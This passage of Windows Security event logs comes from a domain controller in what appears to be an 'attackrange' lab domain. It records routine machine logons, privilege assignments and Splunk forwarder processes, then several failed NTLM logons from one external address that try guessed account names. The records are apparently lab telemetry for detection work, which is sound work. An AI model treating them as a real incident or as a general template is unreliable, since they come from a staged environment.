TaskCategory=Special Logon
OpCode=Info
RecordNumber=263851
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x770E30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:31:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263853
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x76FA26
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:31:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263854
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x770E30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:31:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263857
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x771BF2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:31:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263856
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x771BF2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51593
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:31:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263855
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x771BF2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:32:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263858
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1514
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263860
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263859
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263861
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263862
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263864
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1830
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263863
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263870
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774B0E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263869
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x774B0E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51600
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263868
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774B0E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263867
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774AA2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263866
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x774AA2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51599
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:32:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263865
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x774AA2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:32:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263873
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77585E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:32:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263872
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x77585E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51609
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:32:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263871
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x77585E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:33:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263874
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: sptservice
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: FreeRDP
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263875
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SAAZDEPUSR
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows7
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:02 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263876
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: bwadmin
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows2012
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263877
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: cbadmin
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: Windows8
Source Network Address: 193.169.255.186
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:33:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
